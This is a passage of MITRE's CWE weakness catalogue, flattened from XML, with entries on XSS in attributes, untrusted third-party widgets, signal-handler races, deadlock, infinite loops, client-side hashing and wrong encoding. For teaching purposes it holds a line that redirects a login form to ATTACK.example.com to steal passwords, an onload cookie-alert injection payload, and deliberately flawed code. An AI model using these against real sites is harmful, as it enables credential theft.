https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0127 - - - CVE-2005-1971 - Directory traversal vulnerability in PHP include statement. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1971 - - - CVE-2005-3335 - PHP file inclusion issue, both remote and local; local include uses ".." and "%00" characters as a manipulation, but many remote file inclusion issues probably have this vector. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3335 - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2010-11-29 - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences, Demonstrative_Examples, Observed_Examples, Potential_Mitigations, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, References, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships, Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2021-03-15 - updated Potential_Mitigations, Related_Attack_Patterns - - - - - The software does not neutralize or incorrectly neutralizes "javascript:" or other URIs from dangerous attributes within tags, such as onmouseover, onload, onerror, or style. - - - - - - Primary - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Availability - Read Application Data - Execute Unauthorized Code or Commands - - - - - Implementation - Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including tag attributes, hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended. - - - Implementation - Output Encoding - - Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. - The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks. - - - - Implementation - With Struts, write all data from form beans with the bean's filter attribute set to true. - - - Implementation - Attack Surface Reduction - To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set. - Defense in Depth - - - - - CVE-2001-0520 - Bypass filtering of SCRIPT tags using onload in BODY, href in A, BUTTON, INPUT, and others. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0520 - - - CVE-2002-1493 - guestbook XSS in STYLE or IMG SRC attributes. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1493 - - - CVE-2002-1965 - Javascript in onerror attribute of IMG tag. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1965 - - - CVE-2002-1495 - XSS in web-based email product via onmouseover event. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1495 - - - CVE-2002-1681 - XSS via script in <P> tag. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1681 - - - CVE-2004-1935 - Onload, onmouseover, and other events in an e-mail attachment. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1935 - - - CVE-2005-0945 - Onmouseover and onload events in img, link, and mail tags. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0945 - - - CVE-2003-1136 - Javascript in onmouseover attribute in e-mail address or URL. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1136 - - - - - XSS using Script in Attributes - - - SFP24 - Tainted input to command - - - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Observed_Example, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships - - - CWE Content Team - MITRE - 2010-04-05 - updated Description, Name, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - XSS using Script in Attributes - Failure to Sanitize Script in Attributes in a Web Page - - - - The software includes web functionality (such as a web widget) from another domain, which causes it to operate within the domain of the software, potentially granting total access and control of the software to the untrusted source. - - Including third party functionality in a web-based environment is risky, especially if the source of the functionality is untrusted. - Even if the third party is a trusted source, the software may still be exposed to attacks and malicious behavior if that trusted source is compromised, or if the code is modified in transmission from the third party to the software. - This weakness is common in "mashup" development on the web, which may include source functionality from other domains. For example, Javascript-based web widgets may be inserted by using '<SCRIPT SRC="http://other.domain.here">' tags, which causes the code to run in the domain of the software, not the remote site from which the widget was loaded. As a result, the included code has access to the local DOM, including cookies and other data that the developer might not want the remote site to be able to access. - Such dependencies may be desirable, or even required, but sometimes programmers are not aware that a dependency exists. - - - - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Confidentiality - Integrity - Availability - Execute Unauthorized Code or Commands - - - - - This login webpage includes a weather widget from an external website: - - <div class="header"> Welcome!<div id="loginBox">Please Login:<form id ="loginForm" name="loginForm" action="login.php" method="post">Username: <input type="text" name="username" /><br/>Password: <input type="password" name="password" /><input type="submit" value="Login" /></form></div><div id="WeatherWidget"><script type="text/javascript" src="externalDomain.example.com/weatherwidget.js"></script></div></div> - - This webpage is now only as secure as the external domain it is including functionality from. If an attacker compromised the external domain and could add malicious scripts to the weatherwidget.js file, the attacker would have complete control, as seen in any XSS weakness (CWE-79). - For example, user login information could easily be stolen with a single line added to weatherwidget.js: - - - - ...Weather widget code.... - document.getElementById('loginForm').action = "ATTACK.example.com/stealPassword.php"; - - This line of javascript changes the login form's original action target from the original website to an attack site. As a result, if a user attempts to login their username and password will be sent directly to the attack site. - - - - - - - - CWE Content Team - MITRE - 2010-12-08 - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software defines a function that is used as a handler for more than one signal. - - While sometimes intentional and safe, when the same function is used to handle multiple signals, a race condition could occur if the function uses any state outside of its local declaration, such as global variables or non-reentrant functions, or has any side effects. - An attacker could send one signal that invokes the handler function; in many OSes, this will typically prevent the same signal from invoking the handler again, at least until the handler function has completed execution. However, the attacker could then send a different signal that is associated with the same handler function. This could interrupt the original handler function while it is still executing. If there is shared state, then the state could be corrupted. This can lead to a variety of potential consequences depending on context, including denial of service and code execution. - Another rarely-explored possibility arises when the signal handler is only designed to be executed once (if at all). By sending multiple signals, an attacker could invoke the function more than once. This may generate extra, unintended side effects. A race condition might not even be necessary; the attacker could send one signal, wait until it is handled, then send the other signal. - - - - - - - Availability - Integrity - Confidentiality - Access Control - Other - DoS: Crash, Exit, or Restart - Execute Unauthorized Code or Commands - Read Application Data - Gain Privileges or Assume Identity - Bypass Protection Mechanism - Varies by Context - The most common consequence will be a corruption of the state of the software, possibly leading to a crash or exit. However, if the signal handler is operating on state variables for security relevant libraries or protection mechanisms, the consequences can be far more severe, including protection mechanism bypass, privilege escalation, or information exposure. - - - - - This code registers the same signal handler function with two different signals. - - void handler (int sigNum) {...} - int main (int argc, char* argv[]) {signal(SIGUSR1, handler)signal(SIGUSR2, handler)} - - - - This code registers the same signal handler function with two different signals (CWE-831). If those signals are sent to the process, the handler creates a log message (specified in the first argument to the program) and exits. - - char *logMessage; - void handler (int sigNum) { - syslog(LOG_NOTICE, "%s\n", logMessage);free(logMessage); - /* artificially increase the size of the timing window to make demonstration of this weakness easier. */ - - sleep(10);exit(0); - } - int main (int argc, char* argv[]) { - logMessage = strdup(argv[1]); - /* Register signal handlers. */ - - signal(SIGHUP, handler);signal(SIGTERM, handler); - /* artificially increase the size of the timing window to make demonstration of this weakness easier. */ - - sleep(10); - } - - The handler function uses global state (globalVar and logMessage), and it can be called by both the SIGHUP and SIGTERM signals. An attack scenario might follow these lines: - - - - The program begins execution, initializes logMessage, and registers the signal handlers for SIGHUP and SIGTERM. - - - The program begins its "normal" functionality, which is simplified as sleep(), but could be any functionality that consumes some time. - - - The attacker sends SIGHUP, which invokes handler (call this "SIGHUP-handler"). - - - SIGHUP-handler begins to execute, calling syslog(). - - - syslog() calls malloc(), which is non-reentrant. malloc() begins to modify metadata to manage the heap. - - - The attacker then sends SIGTERM. - - - SIGHUP-handler is interrupted, but syslog's malloc call is still executing and has not finished modifying its metadata. - - - The SIGTERM handler is invoked. - - - SIGTERM-handler records the log message using syslog(), then frees the logMessage variable. - - - - At this point, the state of the heap is uncertain, because malloc is still modifying the metadata for the heap; the metadata might be in an inconsistent state. The SIGTERM-handler call to free() is assuming that the metadata is inconsistent, possibly causing it to write data to the wrong location while managing the heap. The result is memory corruption, which could lead to a crash or even code execution, depending on the circumstances under which the code is running. - Note that this is an adaptation of a classic example as originally presented by Michal Zalewski [REF-360]; the original example was shown to be exploitable for code execution. - Also note that the strdup(argv[1]) call contains a potential buffer over-read (CWE-126) if the program is called without any arguments, because argc would be 0, and argv[1] would point outside the bounds of the array. - - - - - - - - - CWE Content Team - MITRE - 2010-12-12 - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2014-06-23 - updated Demonstrative_Examples, References - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software attempts to unlock a resource that is not locked. - Depending on the locking functionality, an unlock of a non-locked resource might cause memory corruption or other modification to the resource (or its associated metadata that is used for tracking locks). - - - - - - Integrity - Confidentiality - Availability - Other - DoS: Crash, Exit, or Restart - Execute Unauthorized Code or Commands - Modify Memory - Other - Depending on the locking being used, an unlock operation might not have any adverse effects. When effects exist, the most common consequence will be a corruption of the state of the software, possibly leading to a crash or exit; depending on the implementation of the unlocking, memory corruption or code execution could occur. - - - - - CVE-2010-4210 - function in OS kernel unlocks a mutex that was not previously locked, causing a panic or overwrite of arbitrary memory. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4210 - - - CVE-2008-4302 - Chain: OS kernel does not properly handle a failure of a function call (CWE-755), leading to an unlock of a resource that was not locked (CWE-832), with resultant crash. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4302 - - - CVE-2009-1243 - OS kernel performs an unlock in some incorrect circumstances, leading to panic. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1243 - - - - - CWE Content Team - MITRE - 2010-12-12 - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software contains multiple threads or executable segments that are waiting for each other to release a necessary lock, resulting in deadlock. - - - - - - - Availability - DoS: Resource Consumption (CPU) - DoS: Resource Consumption (Other) - DoS: Crash, Exit, or Restart - Each thread of execution will "hang" and prevent tasks from completing. In some cases, CPU consumption may occur if a lock check occurs in a tight loop. - - - - - CVE-1999-1476 - A bug in some Intel Pentium processors allow DoS (hang) via an invalid "CMPXCHG8B" instruction, causing a deadlock - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1476 - - - CVE-2009-2857 - OS deadlock - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2857 - - - CVE-2009-1961 - OS deadlock involving 3 separate functions - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1961 - - - CVE-2009-2699 - deadlock in library - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2699 - - - CVE-2009-4272 - deadlock triggered by packets that force collisions in a routing table - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4272 - - - CVE-2002-1850 - read/write deadlock between web server and script - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1850 - - - CVE-2004-0174 - web server deadlock involving multiple listening connections - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0174 - - - CVE-2009-1388 - multiple simultaneous calls to the same function trigger deadlock. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1388 - - - CVE-2006-5158 - chain: other weakness leads to NULL pointer dereference (CWE-476) or deadlock (CWE-833). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5158 - - - CVE-2006-4342 - deadlock when an operation is performed on a resource while it is being removed. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4342 - - - CVE-2006-2374 - Deadlock in device driver triggered by using file handle of a related device. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2374 - - - CVE-2006-2275 - Deadlock when large number of small messages cannot be processed quickly enough. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2275 - - - CVE-2005-3847 - OS kernel has deadlock triggered by a signal during a core dump. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3847 - - - CVE-2005-3106 - Race condition leads to deadlock. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3106 - - - CVE-2005-2456 - Chain: array index error (CWE-129) leads to deadlock (CWE-833) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2456 - - - - - LCK08-J - Ensure actively held locks are released on exceptional conditions - - - - - - - - - - - - CWE Content Team - MITRE - 2010-12-12 - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated References - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2019-01-03 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Observed_Examples - - - - - The software performs an iteration or loop without sufficiently limiting the number of times that the loop is executed. - If the iteration can be influenced by an attacker, this weakness could allow attackers to consume excessive resources such as CPU or memory. In many cases, a loop does not need to be infinite in order to cause enough resource consumption to adversely affect the software or its host system; it depends on the amount of resources consumed per iteration. - - - - - - Availability - DoS: Resource Consumption (CPU) - DoS: Resource Consumption (Memory) - DoS: Amplification - DoS: Crash, Exit, or Restart - Excessive looping will cause unexpected consumption of resources, such as CPU cycles or memory. The software's operation may slow down, or cause a long time to respond. If limited resources such as memory are consumed for each iteration, the loop may eventually cause a crash or program exit due to exhaustion of resources, such as an out-of-memory error. - - - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Fuzz Tester - Framework-based Fuzzer - Forced Path Execution - - - - - SOAR Partial - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Focused Manual Spotcheck - Focused manual analysis of source - Manual Source Code Review (not inspections) - - - - - SOAR Partial - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Context-configured Source Code Weakness Analyzer - - - - - High - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - - - - - High - - - - - CVE-2011-1027 - Chain: off-by-one error leads to infinite loop using invalid hex-encoded characters. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1027 - - - CVE-2006-6499 - Chain: web browser crashes due to infinite loop - "bad - looping logic [that relies on] floating point math [CWE-1339] to exit - the loop [CWE-835]" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6499 - - - - - - - - CWE Content Team - MITRE - 2011-03-22 - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships, Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Observed_Examples, Relationships - - - - - The program contains an iteration or loop with an exit condition that cannot be reached, i.e., an infinite loop. - If the loop can be influenced by an attacker, this weakness could allow attackers to consume excessive resources such as CPU or memory. - - - - - - - - - - Availability - DoS: Resource Consumption (CPU) - DoS: Resource Consumption (Memory) - DoS: Amplification - An infinite loop will cause unexpected consumption of resources, such as CPU cycles or memory. The software's operation may slow down, or cause a long time to respond. - - - - - In the following code the method processMessagesFromServer attempts to establish a connection to a server and read and process messages from the server. The method uses a do/while loop to continue trying to establish the connection to the server when an attempt fails. - - int processMessagesFromServer(char *hostaddr, int port) { - ...int servsock;int connected;struct sockaddr_in servaddr; - - // create socket to connect to server - servsock = socket( AF_INET, SOCK_STREAM, 0);memset( &servaddr, 0, sizeof(servaddr));servaddr.sin_family = AF_INET;servaddr.sin_port = htons(port);servaddr.sin_addr.s_addr = inet_addr(hostaddr); - do { - - - // establish connection to server - connected = connect(servsock, (struct sockaddr *)&servaddr, sizeof(servaddr)); - - // if connected then read and process messages from server - if (connected > -1) { - - - // read and process messages - ... - } - - - - // keep trying to establish connection to the server - } while (connected < 0); - - // close socket and return success or failure - ... - } - - However, this will create an infinite loop if the server does not respond. This infinite loop will consume system resources and can be used to create a denial of service attack. To resolve this a counter should be used to limit the number of attempts to establish a connection to the server, as in the following code. - - int processMessagesFromServer(char *hostaddr, int port) { - ... - // initialize number of attempts counter - int count = 0;do { - - - // establish connection to server - connected = connect(servsock, (struct sockaddr *)&servaddr, sizeof(servaddr)); - - // increment counter - count++; - - // if connected then read and process messages from server - if (connected > -1) { - - - // read and process messages - ... - } - - - - // keep trying to establish connection to the server - - - // up to a maximum number of attempts - } while (connected < 0 && count < MAX_ATTEMPTS); - - // close socket and return success or failure - ... - } - - - - For this example the method isReorderNeeded as part of a bookstore application that determines if a particular book needs to be reordered based on the current inventory count and the rate at which the book is being sold. - - public boolean isReorderNeeded(String bookISBN, int rateSold) { - - boolean isReorder = false; - int minimumCount = 10;int days = 0; - - // get inventory count for book - int inventoryCount = inventory.getIventoryCount(bookISBN); - - // find number of days until inventory count reaches minimum - while (inventoryCount > minimumCount) { - - inventoryCount = inventoryCount - rateSold;days++; - - } - - // if number of days within reorder timeframe - - - // set reorder return boolean to true - if (days > 0 && days < 5) {isReorder = true;} - return isReorder; - } - - However, the while loop will become an infinite loop if the rateSold input parameter has a value of zero since the inventoryCount will never fall below the minimumCount. In this case the input parameter should be validated to ensure that a value of zero does not cause an infinite loop,as in the following code. - - public boolean isReorderNeeded(String bookISBN, int rateSold) { - ... - - // validate rateSold variable - if (rateSold < 1) {return isReorder;} - ... - } - - - - - - CVE-2011-1027 - Chain: off-by-one error leads to infinite loop using invalid hex-encoded characters. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1027 - - - CVE-2011-1142 - Chain: self-referential values in recursive definitions lead to infinite loop. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1142 - - - CVE-2011-1002 - NULL UDP packet is never cleared from a queue, leading to infinite loop. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1002 - - - CVE-2006-6499 - Chain: web browser crashes due to infinite loop - "bad - looping logic [that relies on] floating point math [CWE-1339] to exit - the loop [CWE-835]" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6499 - - - CVE-2010-4476 - Floating point conversion routine cycles back and forth between two different values. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4476 - - - CVE-2010-4645 - Floating point conversion routine cycles back and forth between two different values. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4645 - - - CVE-2010-2534 - Chain: improperly clearing a pointer in a linked list leads to infinite loop. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2534 - - - CVE-2013-1591 - Chain: an integer overflow (CWE-190) in the image size calculation causes an infinite loop (CWE-835) which sequentially allocates buffers without limits (CWE-1325) until the stack is full. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1591 - - - CVE-2008-3688 - Chain: A denial of service may be caused by an uninitialized variable (CWE-457) allowing an infinite loop (CWE-835) resulting from a connection to an unresponsive server. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3688 - - - - - ASCSM-CWE-835 - - - - - - - - - CWE Content Team - MITRE - 2011-03-22 - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2019-01-03 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Observed_Examples - - - CWE Content Team - MITRE - 2021-07-20 - updated Observed_Examples - - - - - The software records password hashes in a data store, receives a hash of a password from a client, and compares the supplied hash to the hash obtained from the data store. - - Some authentication mechanisms rely on the client to generate the hash for a password, possibly to reduce load on the server or avoid sending the password across the network. However, when the client is used to generate the hash, an attacker can bypass the authentication by obtaining a copy of the hash, e.g. by using SQL injection to compromise a database of authentication credentials, or by exploiting an information exposure. The attacker could then use a modified client to replay the stolen hash without having knowledge of the original password. - As a result, the server-side comparison against a client-side hash does not provide any more security than the use of passwords without hashing. - - - - - - - - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Access Control - Bypass Protection Mechanism - Gain Privileges or Assume Identity - An attacker could bypass the authentication routine without knowing the original password. - - - - - CVE-2009-1283 - Product performs authentication with user-supplied password hashes that can be obtained from a separate SQL injection vulnerability (CVE-2009-1282). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1283 - - - CVE-2005-3435 - Product allows attackers to bypass authentication by obtaining the password hash for another user and specifying the hash in the pwd argument. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3435 - - - - - - - - - CWE Content Team - MITRE - 2011-03-22 - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-10-30 - updated Observed_Examples - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Related_Attack_Patterns - - - - - The software requires that an actor should only be able to perform an action once, or to have only one unique action, but the software does not enforce or improperly enforces this restriction. - In various applications, a user is only expected to perform a certain action once, such as voting, requesting a refund, or making a purchase. When this restriction is not enforced, sometimes this can have security implications. For example, in a voting application, an attacker could attempt to "stuff the ballot box" by voting multiple times. If these votes are counted separately, then the attacker could directly affect who wins the vote. This could have significant business impact depending on the purpose of the software. - - - - - - - - - Other - An attacker might be able to gain advantage over other users by performing the action multiple times, or affect the correctness of the software. - - - - - CVE-2008-0294 - Ticket-booking web application allows a user to lock a seat more than once. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0294 - - - CVE-2005-4051 - CMS allows people to rate downloads by voting more than once. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4051 - - - CVE-2002-216 - Polling software allows people to vote more than once by setting a cookie. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-216 - - - CVE-2003-1433 - Chain: lack of validation of a challenge key in a game allows a player to register multiple times and lock other players out of the game. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1433 - - - CVE-2002-1018 - Library feature allows attackers to check out the same e-book multiple times, preventing other users from accessing copies of the e-book. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1018 - - - CVE-2009-2346 - Protocol implementation allows remote attackers to cause a denial of service (call-number exhaustion) by initiating many message exchanges. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2346 - - - - - CWE Content Team - MITRE - 2011-03-24 - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software uses or specifies an encoding when generating output to a downstream component, but the specified encoding is not the same as the encoding that is expected by the downstream component. - - This weakness can cause the downstream component to use a decoding method that produces different data than what the software intended to send. When the wrong encoding is used - even if closely related - the downstream component could decode the data incorrectly. This can have security consequences when the provided boundaries between control and data are inadvertently broken, because the resulting data could introduce control characters or special elements that were not sent by the software. The resulting data could then be used to bypass protection mechanisms such as input validation, and enable injection attacks. - While using output encoding is essential for ensuring that communications between components are accurate, the use of the wrong encoding - even if closely related - could cause the downstream component to misinterpret the output. - For example, HTML entity encoding is used for elements in the HTML body of a web page. However, a programmer might use entity encoding when generating output for that is used within an attribute of an HTML tag, which could contain functional Javascript that is not affected by the HTML encoding. - While web applications have received the most attention for this problem, this weakness could potentially apply to any type of software that uses a communications stream that could support multiple encodings. - - - - - - - - - - - Integrity - Confidentiality - Availability - Modify Application Data - Execute Unauthorized Code or Commands - An attacker could modify the structure of the message or data being sent to the downstream component, possibly injecting commands. - - - - - Implementation - Output Encoding - Use context-aware encoding. That is, understand which encoding is being used by the downstream component, and ensure that this encoding is used. If an encoding can be specified, do so, instead of assuming that the default encoding is the same as the default being assumed by the downstream component. - - - Architecture and Design - Output Encoding - Where possible, use communications protocols or data formats that provide strict boundaries between control and data. If this is not feasible, ensure that the protocols or formats allow the communicating components to explicitly state which encoding/decoding method is being used. Some template frameworks provide built-in support. - - - Architecture and Design - Libraries or Frameworks - - Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - For example, consider using the ESAPI Encoding control [REF-45] or a similar tool, library, or framework. These will help the programmer encode outputs in a manner less prone to error. - Note that some template mechanisms provide built-in support for the appropriate encoding. - - - - - - This code dynamically builds an HTML page using POST data: - - $username = $_POST['username'];$picSource = $_POST['picsource'];$picAltText = $_POST['picalttext']; - ... - - echo "<title>Welcome, " . htmlentities($username) ."</title>";echo "<img src='". htmlentities($picSource) ." ' alt='". htmlentities($picAltText) . '" />'; - ... - - - - The programmer attempts to avoid XSS exploits (CWE-79) by encoding the POST values so they will not be interpreted as valid HTML. However, the htmlentities() encoding is not appropriate when the data are used as HTML attributes, allowing more attributes to be injected. - For example, an attacker can set picAltText to: - - "altTextHere' onload='alert(document.cookie)" - - This will result in the generated HTML image tag: - - <img src='pic.jpg' alt='altTextHere' onload='alert(document.cookie)' /> - - The attacker can inject arbitrary javascript into the tag due to this incorrect encoding. - - - - - CVE-2009-2814 - Server does not properly handle requests that do not contain UTF-8 data; browser assumes UTF-8, allowing XSS. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2814 - - - - - IDS13-J - Use compatible encodings on both sides of file or network IO - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2011-03-24 - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Demonstrative_Examples, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2012-05-11 - updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE 